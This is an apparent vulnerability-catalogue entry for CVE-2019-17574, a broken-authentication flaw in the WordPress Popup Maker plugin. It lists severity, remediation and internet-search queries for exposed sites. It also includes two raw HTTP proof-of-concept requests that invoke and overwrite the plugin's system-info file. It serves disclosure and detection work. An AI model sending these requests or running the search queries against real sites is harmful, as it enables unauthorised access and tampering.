| Title | Popup-Maker < 1.8.12 - Broken Authentication |
|---|---|
| Author | DhiyaneshDK |
| Severity | Critical |
| Impact | Unauthenticated attackers can gain administrative access to the WordPress site. |
| Remediation | Update Popup-Maker plugin to version 1.8.12 or later. |
| CVSS Score | 9.1 |
| EPSS Score | 0.86894 |
| CVE ID | CVE-2019-17574 |
| CWE ID | CWE-639 |
| Shodan Query | http.html:/wp-content/plugins/popup-maker/ |
| Fofa Query | body=/wp-content/plugins/popup-maker/ |
| Tags | cve cve2019 wpscan wp wordpress wp-plugin disclosure popup-maker auth-bypass code-atlantic vkev vuln |
An issue was discovered in the Popup Maker plugin before 1.8.13 for WordPress. An unauthenticated attacker can partially control the arguments of the do_action function to invoke certain popmake_ or pum_ methods, as demonstrated by controlling content and delivery of popmake-system-info.txt (aka the “support debug text file”).
GET /?pum_action=tools_page_tab_system_info HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Connection: close
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
popmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17574.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-17574.pcap
N/AN/A